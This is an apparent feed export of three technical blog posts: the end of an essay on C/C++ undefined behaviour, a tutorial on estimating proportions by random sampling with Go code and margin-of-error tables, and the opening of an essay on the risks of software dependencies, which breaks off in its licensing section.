Lattner gives <a href="https://blog.llvm.org/2011/05/what-every-c-programmer-should-know_14.html">an equivalent example</a> (search for <code>FP()</code>)
and then this advice:<blockquote>
<p>
The upshot is that it is a fixable issue: if you suspect something weird is going on like this, try building at -O0, where the compiler is much less likely to be doing any optimizations at all.</blockquote>
<p>
This advice is not uncommon: if you cannot debug the correctness problems in your C++ program, disable optimizations.
<a class=anchor href="#sort"><h2 id="sort">Crashes out of sorts</h2></a>
<p>
C++’s <code>std::sort</code> sorts a collection of values
(abstracted as a random access iterator, but almost always an array)
according to a user-specified comparison function.
The default function is <code>operator<</code>, but you can write any function.
For example if you were sorting instances of class <code>Person</code> your
comparison function might sort by the <code>LastName</code> field, breaking
ties with the <code>FirstName</code> field.
These comparison functions end up being subtle yet boring to write,
and it’s easy to make a mistake.
If you do make a mistake and pass in a comparison function that
returns inconsistent results or accidentally reports that any value
is less than itself, that’s undefined behavior:
<code>std::sort</code> is now allowed to do whatever it likes,
including walking off either end of the array
and corrupting other memory.
If you’re lucky, it will pass some of this memory to your comparison
function, and since it won’t have pointers in the right places,
your comparison function will crash.
Then at least you have a chance of guessing the comparison function is at fault.
In the worst case, memory is silently corrupted and the crash happens much later,
with <code>std::sort</code> is nowhere to be found.
<p>
Programmers make mistakes, and when they do, <code>std::sort</code> corupts memory.
This is not hypothetical. It happens enough in practice to be a
<a href="https://stackoverflow.com/questions/18291620/why-will-stdsort-crash-if-the-comparison-function-is-not-as-operator">popular question on StackOverflow</a>.
<p>
As a final note, it turns out that <code>operator<</code> is not a valid comparison function
on floating-point numbers if NaNs are involved, because:
<ul>
<li>
1 < NaN and NaN < 1 are both false, implying NaN == 1.
<li>
2 < NaN and NaN < 2 are both false, implying NaN == 2.
<li>
Since NaN == 1 and NaN == 2, 1 == 2, yet 1 < 2 is true.</ul>
<p>
Programming with NaNs is never pleasant, but it seems particularly extreme
to allow <code>std::sort</code> to crash when handed one.
<a class=anchor href="#reveal"><h2 id="reveal">Reflections and revealed preferences</h2></a>
<p>
Looking over these examples,
it could not be more obvious that in modern C and C++,
performance is job one and correctness is job two.
To a C/C++ compiler, a programmer making a mistake and (gasp!)
compiling a program containing a bug is just not a concern.
Rather than have the compiler point out the bug or at least
compile the code in a clear, understandable, debuggable manner,
the approach over and over again is
to let the compiler do whatever it likes,
in the name of performance.
<p>
This may not be the wrong decision for these languages.
There are undeniably power users for whom every last bit of performance
translates to very large sums of money, and I don’t claim
to know how to satisfy them otherwise.
On the other hand, this performance comes at a significant
development cost, and there are probably plenty of people and companies
who spend more than their performance savings
on unnecessarily difficult debugging sessions
and additional testing and sanitizing.
It also seems like there must be a middle ground where
programmers retain most of the control they have in C and C++
but the program doesn’t crash when sorting NaNs or
behave arbitrarily badly if you accidentally dereference a null pointer.
Whatever the merits, it is important to see clearly the choice that C and C++ are making.
<p>
In the case of arithmetic overflow, later drafts of the
proposal removed the defined behavior for wrapping, explaining:<blockquote>
<p>
The main change between [P0907r0] and the subsequent revision is to maintain undefined behavior when signed integer overflow occurs, instead of defining wrapping behavior. This direction was motivated by:
<ul>
<li>
Performance concerns, whereby defining the behavior prevents optimizers from assuming that overflow never occurs;
<li>
Implementation leeway for tools such as sanitizers;
<li>
Data from Google suggesting that over 90% of all overflow is a bug, and defining wrapping behavior would not have solved the bug.</ul>
</blockquote>
<p>
Again, performance concerns rank first.
I find the third item in the list particularly telling.
I’ve known C/C++ compiler authors who got excited about a 0.1% performance improvement,
and incredibly excited about 1%.
Yet here we have an idea that would change 10% of affected programs from incorrect to correct,
and it is rejected, because performance is more important.
<p>
The argument about sanitizers is more nuanced.
Leaving a behavior undefined allows any implementation at all, including reporting the
behavior at runtime and stopping the program.
True, the widespread use of undefined behavior enables sanitizers like ThreadSanitizer, MemorySanitizer, and UBSan,
but so would defining the behavior as “either this specific behavior, or a sanitizer report.”
If you believed correctness was job one, you could
define overflow to wrap, fixing the 10% of programs outright
and making the 90% behave at least more predictably,
and then at the same time define that overflow is still
a bug that can be reported by sanitizers.
You might object that requiring wrapping in the absence of a sanitizer
would hurt performance, and that’s fine: it’s just more evidence that
performance trumps correctness.
<p>
One thing I find surprising, though, is that correctness gets ignored even
when it clearly doesn’t hurt performance.
It would certainly not hurt performance to emit a compiler warning
about deleting the <code>if</code> statement testing for signed overflow,
or about optimizing away the possible null pointer dereference in <code>Do()</code>.
Yet I could find no way to make compilers report either one; certainly not <code>-Wall</code>.
<p>
The explanatory shift from non-portable to optimizable also seems revealing.
As far as I can tell, C89 did not use performance as a justification for any of
its undefined behaviors.
They were non-portabilities, like signed overflow and null pointer dereferences,
or they were outright bugs, like use-after-free.
But now experts like Chris Lattner and Hans Boehm point to optimization potential,
not portability, as justification for undefined behaviors.
I conclude that the rationales really have shifted from the mid-1980s to today:
an idea that meant to capture non-portability has been preserved for performance,
trumping concerns like correctness and debuggability.
<p>
Occasionally in Go we have <a href="https://go.dev/blog/compat#input">changed library functions to remove surprising behavior</a>,
It’s always a difficult decision, but we are willing
to break existing programs depending on a mistake
if correcting the mistake fixes a much larger number of programs.
I find it striking that the C and C++ standards committees are
willing in some cases to break existing programs if doing so
merely <i>speeds up</i> a large number of programs.
This is exactly what happened with the infinite loops.
<p>
I find the infinite loop example telling for a second reason:
it shows clearly the escalation from non-portable to optimizable.
In fact, it would appear that if you want to break C++ programs in
service of optimization, one possible approach is to just do that in a
compiler and wait for the standards committee to notice.
The de facto non-portability of whatever programs you have broken
can then serve as justification for undefining their behavior,
leading to a future version of the standard in which your optimization is legal.
In the process, programmers have been handed yet another footgun
to try to avoid setting off.
<p>
(A common counterargument is that the standards committee cannot
force existing implementations to change their compilers.
This doesn’t hold up to scrutiny: every new feature that gets added
is the standards committee forcing existing implementations
to change their compilers.)
<p>
I am not claiming that anything should change about C and C++.
I just want people to recognize that the current versions of these
sacrifice correctness for performance.
To some extent, all languages do this: there is almost always a tradeoff
between performance and slower, safer implementations.
Go has data races in part for performance reasons:
we could have done everything by message copying
or with a single global lock instead, but the performance wins of
shared memory were too large to pass up.
For C and C++, though, it seems no performance win is too small
to trade against correctness.
<p>
As a programmer, you have a tradeoff to make too,
and the language standards make it clear which side they are on.
In some contexts, performance is the dominant priority and
nothing else matters quite as much.
If so, C or C++ may be the right tool for you.
But in most contexts, the balance flips the other way.
If programmer productivity, debuggability, reproducible bugs,
and overall correctness and understandability
are more important than squeezing every last little bit of performance,
then C and C++ are not the right tools for you.
I say this with some regret, as I spent many years happily writing C programs.
<p>
I have tried to avoid exaggerated, hyperbolic language in this post,
instead laying out the tradeoff and the preferences revealed
by the decisions being made.
John Regehr wrote a less restrained series of posts about undefined behavior
a decade ago, and in <a href="https://blog.regehr.org/archives/226">one of them</a> he concluded:<blockquote>
<p>
It is basically evil to make certain program actions wrong, but to not give developers any way to tell whether or not their code performs these actions and, if so, where. One of C’s design points was “trust the programmer.” This is fine, but there’s trust and then there’s trust. I mean, I trust my 5 year old but I still don’t let him cross a busy street by himself. Creating a large piece of safety-critical or security-critical code in C or C++ is the programming equivalent of crossing an 8-lane freeway blindfolded.</blockquote>
<p>
To be fair to C and C++,
if you set yourself the goal of crossing an 8-lane freeway blindfolded,
it does make sense to focus on doing it as fast as you possibly can.
The Magic of Sampling, and its Limitationstag:research.swtch.com,2012:research.swtch.com/sample2023-02-04T12:00:00-05:002023-02-04T12:02:00-05:00The magic of using small samples to learn about large data sets.
<p>
Suppose I have a large number of M&Ms
and want to estimate what fraction of them have <a href="https://spinroot.com/pjw">Peter’s face</a> on them.
As one does.
<p>
<img name="sample-pjw1" class="center pad resizable" width=450 height=276 src="sample-pjw1.jpg" srcset="sample-pjw1.jpg 1x, sample-pjw1@2x.jpg 2x, sample-pjw1@4x.jpg 4x">
<p>
If I am too lazy to count them all, I can estimate the true fraction using sampling:
pick N at random, count how many P have Peter’s face, and then estimate
the fraction to be P/N.
<p>
I can <a href="https://go.dev/play/p/GQr6ShQ_ivG">write a Go program</a> to pick 10 of the 37 M&Ms for me: 27 30 1 13 36 5 33 7 10 19.
(Yes, I am too lazy to count them, but I was not too lazy to number the M&Ms in order to use the Go program.)
<p>
<img name="sample-pjw2" class="center pad resizable" width=450 height=73 src="sample-pjw2.jpg" srcset="sample-pjw2.jpg 1x, sample-pjw2@2x.jpg 2x, sample-pjw2@4x.jpg 4x">
<p>
Based on this estimate, we can estimate that 3/10 = 30% of my M&Ms have Peter’s face.
We can do it a few more times:
<p>
<img name="sample-pjw3" class="center pad resizable" width=450 height=64 src="sample-pjw3.jpg" srcset="sample-pjw3.jpg 1x, sample-pjw3@2x.jpg 2x, sample-pjw3@4x.jpg 4x">
<p>
<img name="sample-pjw4" class="center pad resizable" width=450 height=61 src="sample-pjw4.jpg" srcset="sample-pjw4.jpg 1x, sample-pjw4@2x.jpg 2x, sample-pjw4@4x.jpg 4x">
<p>
<img name="sample-pjw5" class="center pad resizable" width=450 height=73 src="sample-pjw5.jpg" srcset="sample-pjw5.jpg 1x, sample-pjw5@2x.jpg 2x, sample-pjw5@4x.jpg 4x">
<p>
And we get a few new estimates: 30%, 40%, 20%. The actual fraction turns out to be 9/37 = 24.3%.
These estimates are perhaps not that impressive,
but we are only using 10 samples.
With not too many more samples, we can get far more accurate estimates,
even for much larger data sets.
Suppose we had many more M&Ms, again 24.3% Peter faces, and we sample 100 of them, or 1,000, or 10,000.
Since we’re lazy, let’s write <a href="https://go.dev/play/p/VcqirSSiS1Q">a program to simulate the process</a>.
<pre>$ go run sample.go
10: 40.0% 20.0% 30.0% 0.0% 10.0% 30.0% 10.0% 20.0% 20.0% 0.0%
100: 25.0% 26.0% 21.0% 26.0% 15.0% 25.0% 30.0% 30.0% 29.0% 20.0%
1000: 24.7% 23.8% 21.0% 25.4% 25.1% 24.2% 25.7% 22.9% 24.0% 23.8%
10000: 23.4% 24.6% 24.3% 24.3% 24.7% 24.6% 24.6% 24.7% 24.1% 25.0%
$
</pre>
<p>
Accuracy improves fairly quickly:
<ul>
<li>
With 10 samples, our estimates are accurate to within about 15%.
<li>
With 100 samples, our estimates are accurate to within about 5%.
<li>
With 1,000 samples, our estimates are accurate to within about 3%.
<li>
With 10,000 samples, our estimates are accurate to within about 1%.</ul>
<p>
Because we are estimating only the percentage of Peter faces,
not the total number, the accuracy (also measured in percentages)
does not depend on the total number of M&Ms, only on the number of samples.
So 10,000 samples is enough to get roughly 1% accuracy whether we have
100,000 M&Ms, 1 million M&Ms, or even 100 billion M&Ms!
In the last scenario, we have 1% accuracy despite only sampling 0.00001% of the M&Ms.
<p>
<b>The magic of sampling is that we can derive accurate estimates
about a very large population using a relatively small number of samples.</b>
<p>
Sampling turns many one-off estimations into jobs that are feasible to do by hand.
For example, suppose we are considering revising an error-prone API
and want to estimate how often that API is used incorrectly.
If we have a way to randomly sample uses of the API
(maybe <code>grep -Rn pkg.Func . | shuffle -m 100</code>),
then manually checking 100 of them will give us an estimate
that’s accurate to within 5% or so.
And checking 1,000 of them, which may not take more than an hour or so
if they’re easy to eyeball, improves the accuracy to 1.5% or so.
Real data to decide an important question
is usually well worth a small amount of manual effort.
<p>
For the kinds of decisions I look at related to Go,
this approach comes up all the time:
What fraction of <code>for</code> loops in real code have a <a href="https://github.com/golang/go/discussions/56010">loop scoping bug</a>?
What fraction of warnings by a new <code>go</code> <code>vet</code> check are false positives?
What fraction of modules have no dependencies?
These are drawn from my experience, and so they may seem specific to Go
or to language development, but once you realize that
sampling makes accurate estimates so easy to come by,
all kind of uses present themselves.
Any time you have a large data set,
<pre>select * from data order by random() limit 1000;
</pre>
<p>
is a very effective way to get a data set you can analyze by hand
and still derive many useful conclusions from.
<a class=anchor href="#accuracy"><h2 id="accuracy">Accuracy</h2></a>
<p>
Let’s work out what accuracy we should expect from these estimates.
The brute force approach would be to run many samples of a given size
and calculate the accuracy for each.
<a href="https://go.dev/play/p/NWUOanCpFtl">This program</a> runs 1,000 trials of 100 samples each,
calculating the observed error for each estimate
and then printing them all in sorted order.
If we plot those points one after the other along the x axis,
we get a picture like this:
<p>
<img name="sample1" class="center pad" width=370 height=369 src="sample1.png" srcset="sample1.png 1x, sample1@2x.png 2x">
<p>
The <a href="https://9fans.github.io/plan9port/man/man1/gview.html">data viewer I’m using in this screenshot</a> has scaled the x-axis labels by
a factor of 1,000 (“x in thousands”).
Eyeballing the scatterplot, we can see that half the time the error
is under 3%, and 80% of the time the error is under 5½%.
<p>
We might wonder at this point whether the error
depends on the actual answer (24.3% in our programs so far).
It does: the error will be lower when the population is lopsided.
Obviously, if the M&Ms are 0% or 100% Peter faces,
our estimates will have no error at all.
In a slightly less degenerate case,
if the M&Ms are 1% or 99% Peter faces, the most likely estimate
from just a few samples is 0% or 100%, which has only 1% error.
It turns out that, in general, the error is maximized when
the actual fraction is 50%,
so <a href="https://go.dev/play/p/Vm2s1SwlKKT">we’ll use that</a> for the rest of the analysis.
<p>
With an actual fraction of 50%, 1,000 sorted errors
from estimating by sampling 100 values look like:
<p>
<img name="sample2" class="center pad" width=369 height=369 src="sample2.png" srcset="sample2.png 1x, sample2@2x.png 2x">
<p>
The errors are a bit larger.
Now the half the time the error is 4% and 80% of the time the error is 6%.
Zooming in on the tail end of the plot produces:
<p>
<img name="sample3" class="center pad" width=390 height=368 src="sample3.png" srcset="sample3.png 1x, sample3@2x.png 2x">
<p>
We can see that 90% of the trials have error 8% or less,
95% of the trials have error 10% or less,
and 99% of the trials have error 12% or less.
The statistical way to phrase those statements
is that “a sample of size N = 100
produces a margin of error of 8% with 90% confidence,
10% with 95% confidence,
and 12% with 99% confidence.”
<p>
Instead of eyeballing the graphs, we can <a href="https://go.dev/play/p/Xq7WMyrNWxq">update the program</a>
to compute these numbers directly.
<pre>$ go run sample.go
N = 10: 90%: 30.00% 95%: 30.00% 99%: 40.00%
N = 100: 90%: 9.00% 95%: 11.00% 99%: 13.00%
N = 1000: 90%: 2.70% 95%: 3.20% 99%: 4.30%
N = 10000: 90%: 0.82% 95%: 0.98% 99%: 1.24%
$
</pre>
<p>
There is something meta about using sampling (of trials) to estimate the errors introduced
by sampling of an actual distribution.
What about the error being introduced by sampling the errors?
We could instead write a program to count all possible outcomes
and calculate the exact error distribution,
but counting won’t work for larger sample sizes.
Luckily, others have done the math for us
and even implemented the relevant functions
in Go’s standard <a href="https://pkg.go.dev/math">math package</a>.
The margin of error for a given confidence level
and sample size is:
<pre>func moe(confidence float64, N int) float64 {
return math.Erfinv(confidence) / math.Sqrt(2 * float64(N))
}
</pre>
<p>
That lets us compute the table <a href="https://go.dev/play/p/DKeNfDwLmJZ">more directly</a>.
<pre>$ go run sample.go
N = 10: 90%: 26.01% 95%: 30.99% 99%: 40.73%
N = 20: 90%: 18.39% 95%: 21.91% 99%: 28.80%
N = 50: 90%: 11.63% 95%: 13.86% 99%: 18.21%
N = 100: 90%: 8.22% 95%: 9.80% 99%: 12.88%
N = 200: 90%: 5.82% 95%: 6.93% 99%: 9.11%
N = 500: 90%: 3.68% 95%: 4.38% 99%: 5.76%
N = 1000: 90%: 2.60% 95%: 3.10% 99%: 4.07%
N = 2000: 90%: 1.84% 95%: 2.19% 99%: 2.88%
N = 5000: 90%: 1.16% 95%: 1.39% 99%: 1.82%
N = 10000: 90%: 0.82% 95%: 0.98% 99%: 1.29%
N = 20000: 90%: 0.58% 95%: 0.69% 99%: 0.91%
N = 50000: 90%: 0.37% 95%: 0.44% 99%: 0.58%
N = 100000: 90%: 0.26% 95%: 0.31% 99%: 0.41%
$
</pre>
<p>
We can also reverse the equation to compute the necessary
sample size from a given confidence level and margin of error:
<pre>func N(confidence, moe float64) int {
return int(math.Ceil(0.5 * math.Pow(math.Erfinv(confidence)/moe, 2)))
}
</pre>
<p>
That lets us <a href="https://go.dev/play/p/Y81_FORHvw5">compute this table</a>.
<pre>$ go run sample.go
moe = 5%: 90%: 271 95%: 385 99%: 664
moe = 2%: 90%: 1691 95%: 2401 99%: 4147
moe = 1%: 90%: 6764 95%: 9604 99%: 16588
$
</pre>
<a class=anchor href="#limitations"><h2 id="limitations">Limitations</h2></a>
<p>
To accurately estimate the fraction of items with
a given property, like M&Ms with Peter faces,
each item must have the same chance of being selected,
as each M&M did.
Suppose instead that we had ten bags of M&Ms:
nine one-pound bags with 500 M&Ms each,
and a small bag containing the 37 M&Ms we used before.
If we want to estimate the fraction of M&Ms with
Peter faces, it would not work to sample by
first picking a bag at random
and then picking an M&M at random from the bag.
The chance of picking any specific M&M from a one-pound bag
would be 1/10 × 1/500 = 1/5,000, while the chance
of picking any specific M&M from the small bag would be
1/10 × 1/37 = 1/370.
We would end up with an estimate of around 9/370 = 2.4% Peter faces,
even though the actual answer is 9/(9×500+37) = 0.2% Peter faces.
<p>
The problem here is not the kind of random sampling error
that we computed in the previous section.
Instead it is a systematic error caused by a sampling mechanism
that does not align with the statistic being estimated.
We could recover an accurate estimate by weighting
an M&M found in the small bag as only w = 37/500 of an M&M
in both the numerator and denominator of any estimate.
For example, if we picked 100 M&Ms with replacement from each bag
and found 24 Peter faces in the small bag,
then instead of 24/1000 = 2.4% we would compute 24w/(900+100w) = 0.2%.
<p>
As a less contrived example,
<a href="https://go.dev/blog/pprof">Go’s memory profiler</a>
aims to sample approximately one allocation per half-megabyte allocated
and then derive statistics about where programs allocate memory.
Roughly speaking, to do this the profiler maintains a sampling trigger,
initialized to a random number between 0 and one million.
Each time a new object is allocated,
the profiler decrements the trigger by the size of the object.
When an allocation decrements the trigger below zero,
the profiler samples that allocation
and then resets the trigger to a new random number
between 0 and one million.
<p>
This byte-based sampling means that to estimate the
fraction of bytes allocated in a given function,
the profiler can divide the total sampled bytes allocated in that function
divided by the total sampled bytes allocated in the entire program.
Using the same approach to
estimate the fraction of <i>objects</i> allocated in a given function
would be inaccurate: it would overcount large objects and undercount
small ones, because large objects are more likely to be sampled.
In order to recover accurate statistics about allocation counts,
the profiler applies a size-based weighting function
during the calcuation, just as in the M&M example.
(This is the reverse of the situation with the M&Ms:
we are randomly sampling individual bytes of allocated memory
but now want statistics about their “bags”.)
<p>
It is not always possible to undo skewed sampling,
and the skew makes margin of error calculation
more difficult too.
It is almost always better to make sure that the
sampling is aligned with the statistic you want to compute.
Our Software Dependency Problemtag:research.swtch.com,2012:research.swtch.com/deps2019-01-23T11:00:00-05:002019-01-23T11:02:00-05:00Download and run code from strangers on the internet. What could go wrong?
<p>
For decades, discussion of software reuse was far more common than actual software reuse.
Today, the situation is reversed: developers reuse software written by others every day,
in the form of software dependencies,
and the situation goes mostly unexamined.
<p>
My own background includes a decade of working with
Google’s internal source code system,
which treats software dependencies as a first-class concept,<sup class=footnote><a class=footnote id=fnref-1 href='#fn-1'>1</a></sup>
and also developing support for
dependencies in the Go programming language.<sup class=footnote><a class=footnote id=fnref-2 href='#fn-2'>2</a></sup>
<p>
Software dependencies carry with them
serious risks that are too often overlooked.
The shift to easy, fine-grained software reuse has happened so quickly
that we do not yet understand the best practices for choosing
and using dependencies effectively,
or even for deciding when they are appropriate and when not.
My purpose in writing this article is to raise awareness of the risks
and encourage more investigation of solutions.
<a class=anchor href="#what_is_a_dependency"><h2 id="what_is_a_dependency">What is a dependency?</h2></a>
<p>
In today’s software development world,
a <i>dependency</i> is additional code that you want to call from your program.
Adding a dependency avoids repeating work already done:
designing, writing, testing, debugging, and maintaining a specific
unit of code.
In this article we’ll call that unit of code a <i>package</i>;
some systems use terms like library or module instead of package.
<p>
Taking on externally-written dependencies is an old practice:
most programmers have at one point in their careers
had to go through the steps of manually downloading and installing
a required library, like C’s PCRE or zlib, or C++’s Boost or Qt,
or Java’s JodaTime or JUnit.
These packages contain high-quality, debugged code
that required significant expertise to develop.
For a program that needs the functionality provided by one of these packages,
the tedious work of manually downloading, installing, and updating
the package
is easier than the work of redeveloping that functionality from scratch.
But the high fixed costs of reuse
mean that manually-reused packages tend to be big:
a tiny package would be easier to reimplement.
<p>
A <i>dependency manager</i>
(sometimes called a package manager)
automates the downloading and installation of dependency packages.
As dependency managers
make individual packages easier to download and install,
the lower fixed costs make
smaller packages economical to publish and reuse.
<p>
For example, the Node.js dependency manager NPM provides
access to over 750,000 packages.
One of them, <code>escape-string-regexp</code>,
provides a single function that escapes regular expression
operators in its input.
The entire implementation is:
<pre>var matchOperatorsRe = /[|\\{}()[\]^$+*?.]/g;
module.exports = function (str) {
if (typeof str !== 'string') {
throw new TypeError('Expected a string');
}
return str.replace(matchOperatorsRe, '\\$&');
};
</pre>
<p>
Before dependency managers, publishing an eight-line code library
would have been unthinkable: too much overhead for too little benefit.
But NPM has driven the overhead approximately to zero,
with the result that nearly-trivial functionality
can be packaged and reused.
In late January 2019, the <code>escape-string-regexp</code> package
is explicitly depended upon by almost a thousand
other NPM packages,
not to mention all the packages developers write for their own use
and don’t share.
<p>
Dependency managers now exist for essentially every programming language.
Maven Central (Java),
Nuget (.NET),
Packagist (PHP),
PyPI (Python),
and RubyGems (Ruby)
each host over 100,000 packages.
The arrival of this kind of fine-grained, widespread software reuse
is one of the most consequential shifts in software development
over the past two decades.
And if we’re not more careful, it will lead to serious problems.
<a class=anchor href="#what_could_go_wrong"><h2 id="what_could_go_wrong">What could go wrong?</h2></a>
<p>
A package, for this discussion, is code you download from the internet.
Adding a package as a dependency outsources the work of developing that
code—designing, writing, testing, debugging, and maintaining—to
someone else on the internet,
someone you often don’t know.
By using that code, you are exposing your own program
to all the failures and flaws in the dependency.
Your program’s execution now literally <i>depends</i>
on code downloaded from this stranger on the internet.
Presented this way, it sounds incredibly unsafe.
Why would anyone do this?
<p>
We do this because it’s easy,
because it seems to work,
because everyone else is doing it too,
and, most importantly, because
it seems like a natural continuation of
age-old established practice.
But there are important differences we’re ignoring.
<p>
Decades ago, most developers already
trusted others to write software they depended on,
such as operating systems and compilers.
That software was bought from known sources,
often with some kind of support agreement.
There was still a potential for bugs or outright mischief,<sup class=footnote><a class=footnote id=fnref-3 href='#fn-3'>3</a></sup>
but at least we knew who we were dealing with and usually
had commercial or legal recourses available.
<p>
The phenomenon of open-source software,
distributed at no cost over the internet,
has displaced many of those earlier software purchases.
When reuse was difficult, there were fewer projects publishing reusable code packages.
Even though their licenses typically disclaimed, among other things,
any “implied warranties of merchantability and fitness for
a particular purpose,”
the projects built up well-known reputations
that often factored heavily into people’s decisions about which to use.
The commercial and legal support for trusting our software sources
was replaced by reputational support.
Many common early packages still enjoy good reputations:
consider BLAS (published 1979), Netlib (1987), libjpeg (1991),
LAPACK (1992), HP STL (1994), and zlib (1995).
<p>
Dependency managers have scaled this open-source code reuse model down:
now, developers can share code at the granularity of
individual functions of tens of lines.
This is a major technical accomplishment.
There are myriad available packages,
and writing code can involve such a large number of them,
but the commercial, legal, and reputational support mechanisms
for trusting the code have not carried over.
We are trusting more code with less justification for doing so.
<p>
The cost of adopting a bad dependency can be viewed
as the sum, over all possible bad outcomes,
of the cost of each bad outcome
multiplied by its probability of happening (risk).
<p>
<img name="deps-cost" class="center pad" width=383 height=95 src="deps-cost.png" srcset="deps-cost.png 1x, deps-cost@1.5x.png 1.5x, deps-cost@2x.png 2x, deps-cost@3x.png 3x, deps-cost@4x.png 4x">
<p>
The context where a dependency will be used
determines the cost of a bad outcome.
At one end of the spectrum is a personal hobby project,
where the cost of most bad outcomes
is near zero:
you’re just having fun, bugs have no real impact other than
wasting some time, and even debugging them can be fun.
So the risk probability almost doesn’t matter: it’s being multiplied by zero.
At the other end of the spectrum is production software
that must be maintained for years.
Here, the cost of a bug in
a dependency can be very high:
servers may go down,
sensitive data may be divulged,
customers may be harmed,
companies may fail.
High failure costs make it much more important
to estimate and then reduce any risk of a serious failure.
<p>
No matter what the expected cost,
experiences with larger dependencies
suggest some approaches for
estimating and reducing the risks of adding a software dependency.
It is likely that better tooling is needed to help reduce
the costs of these approaches,
much as dependency managers have focused to date on
reducing the costs of download and installation.
<a class=anchor href="#inspect_the_dependency"><h2 id="inspect_the_dependency">Inspect the dependency</h2></a>
<p>
You would not hire a software developer you’ve never heard of
and know nothing about.
You would learn more about them first:
check references, conduct a job interview,
run background checks, and so on.
Before you depend on a package you found on the internet,
it is similarly prudent
to learn a bit about it first.
<p>
A basic inspection can give you a sense
of how likely you are to run into problems trying to use this code.
If the inspection reveals likely minor problems,
you can take steps to prepare for or maybe avoid them.
If the inspection reveals major problems,
it may be best not to use the package:
maybe you’ll find a more suitable one,
or maybe you need to develop one yourself.
Remember that open-source packages are published
by their authors in the hope that they will be useful
but with no guarantee of usability or support.
In the middle of a production outage, you’ll be the one debugging it.
As the original GNU General Public License warned,
“The entire risk as to the quality and performance of the
program is with you.
Should the program prove defective, you assume the cost of all
necessary servicing, repair or correction.”<sup class=footnote><a class=footnote id=fnref-4 href='#fn-4'>4</a></sup>
<p>
The rest of this section outlines some considerations when inspecting a package
and deciding whether to depend on it.
<a class=anchor href="#design"><h3 id="design">Design</h3></a>
<p>
Is package’s documentation clear? Does the API have a clear design?
If the authors can explain the package’s API and its design well to you, the user,
in the documentation,
that increases the likelihood they have explained the implementation well to the computer, in the source code.
Writing code for a clear, well-designed API is also easier, faster, and hopefully less error-prone.
Have the authors documented what they expect from client code
in order to make future upgrades compatible?
(Examples include the C++<sup class=footnote><a class=footnote id=fnref-5 href='#fn-5'>5</a></sup> and Go<sup class=footnote><a class=footnote id=fnref-6 href='#fn-6'>6</a></sup> compatibility documents.)
<a class=anchor href="#code_quality"><h3 id="code_quality">Code Quality</h3></a>
<p>
Is the code well-written?
Read some of it.
Does it look like the authors have been careful, conscientious, and consistent?
Does it look like code you’d want to debug? You may need to.
<p>
Develop your own systematic ways to check code quality.
For example, something as simple as compiling a C or C++ program with
important compiler warnings enabled (for example, <code>-Wall</code>)
can give you a sense of how seriously the developers work to avoid
various undefined behaviors.
Recent languages like Go, Rust, and Swift use an <code>unsafe</code> keyword to mark
code that violates the type system; look to see how much unsafe code there is.
More advanced semantic tools like Infer<sup class=footnote><a class=footnote id=fnref-7 href='#fn-7'>7</a></sup> or SpotBugs<sup class=footnote><a class=footnote id=fnref-8 href='#fn-8'>8</a></sup> are helpful too.
Linters are less helpful: you should ignore rote suggestions
about topics like brace style and focus instead on semantic problems.
<p>
Keep an open mind to development practices you may not be familiar with.
For example, the SQLite library ships as a single 200,000-line C source file
and a single 11,000-line header, the “amalgamation.”
The sheer size of these files should raise an initial red flag,
but closer investigation would turn up the
actual development source code, a traditional file tree with
over a hundred C source files, tests, and support scripts.
It turns out that the single-file distribution is built automatically from the original sources
and is easier for end users, especially those without dependency managers.
(The compiled code also runs faster, because the compiler can see more optimization opportunities.)
<a class=anchor href="#testing"><h3 id="testing">Testing</h3></a>
<p>
Does the code have tests?
Can you run them?
Do they pass?
Tests establish that the code’s basic functionality is correct,
and they signal that the developer is serious about keeping it correct.
For example, the SQLite development tree has an incredibly thorough test suite
with over 30,000 individual test cases
as well as developer documentation explaining the testing strategy.<sup class=footnote><a class=footnote id=fnref-9 href='#fn-9'>9</a></sup>
On the other hand,
if there are few tests or no tests, or if the tests fail, that’s a serious red flag:
future changes to the package
are likely to introduce regressions that could easily have been caught.
If you insist on tests in code you write yourself (you do, right?),
you should insist on tests in code you outsource to others.
<p>
Assuming the tests exist, run, and pass, you can gather more
information by running them with run-time instrumentation
like code coverage analysis, race detection,<sup class=footnote><a class=footnote id=fnref-10 href='#fn-10'>10</a></sup>
memory allocation checking,
and memory leak detection.
<a class=anchor href="#debugging"><h3 id="debugging">Debugging</h3></a>
<p>
Find the package’s issue tracker.
Are there many open bug reports? How long have they been open?
Are there many fixed bugs? Have any bugs been fixed recently?
If you see lots of open issues about what look like real bugs,
especially if they have been open for a long time,
that’s not a good sign.
On the other hand, if the closed issues show that bugs are
rarely found and promptly fixed,
that’s great.
<a class=anchor href="#maintenance"><h3 id="maintenance">Maintenance</h3></a>
<p>
Look at the package’s commit history.
How long has the code been actively maintained?
Is it actively maintained now?
Packages that have been actively maintained for an extended
amount of time are more likely to continue to be maintained.
How many people work on the package?
Many packages are personal projects that developers
create and share for fun in their spare time.
Others are the result of thousands of hours of work
by a group of paid developers.
In general, the latter kind of package is more likely to have
prompt bug fixes, steady improvements, and general upkeep.
<p>
On the other hand, some code really is “done.”
For example, NPM’s <code>escape-string-regexp</code>,
shown earlier, may never need to be modified again.
<a class=anchor href="#usage"><h3 id="usage">Usage</h3></a>
<p>
Do many other packages depend on this code?
Dependency managers can often provide statistics about usage,
or you can use a web search to estimate how often
others write about using the package.
More users should at least mean more people for whom
the code works well enough,
along with faster detection of new bugs.
Widespread usage is also a hedge against the question of continued maintenance:
if a widely-used package loses its maintainer,
an interested user is likely to step forward.
<p>
For example, libraries like PCRE or Boost or JUnit
are incredibly widely used.
That makes it more likely—although certainly not guaranteed—that
bugs you might otherwise run into have already been fixed,
because others ran into them first.
<a class=anchor href="#security"><h3 id="security">Security</h3></a>
<p>
Will you be processing untrusted inputs with the package?
If so, does it seem to be robust against malicious inputs?
Does it have a history of security problems
listed in the National Vulnerability Database (NVD)?<sup class=footnote><a class=footnote id=fnref-11 href='#fn-11'>11</a></sup>
<p>
For example, when Jeff Dean and I started work on
Google Code Search<sup class=footnote><a class=footnote id=fnref-12 href='#fn-12'>12</a></sup>—<code>grep</code> over public source code—in 2006,
the popular PCRE regular expression library seemed like an obvious choice.
In an early discussion with Google’s security team, however,
we learned that PCRE had a history of problems like buffer overflows,
especially in its parser.
We could have learned the same by searching for PCRE in the NVD.
That discovery didn’t immediately cause us to abandon PCRE,
but it did make us think more carefully about testing and isolation.
<a class=anchor href="#licensing"><h3 id="licensing">Licensing</h3></a>
<p>
Is the code properly licensed?
Does it have a license at all?
Is the license acceptable for your project or company?
A surprising fraction of projects on GitHub have no clear license.
Your project or company may impose further restrictions on the
allowed licenses of dependencies.
For example, Google disallows the use of code licensed under
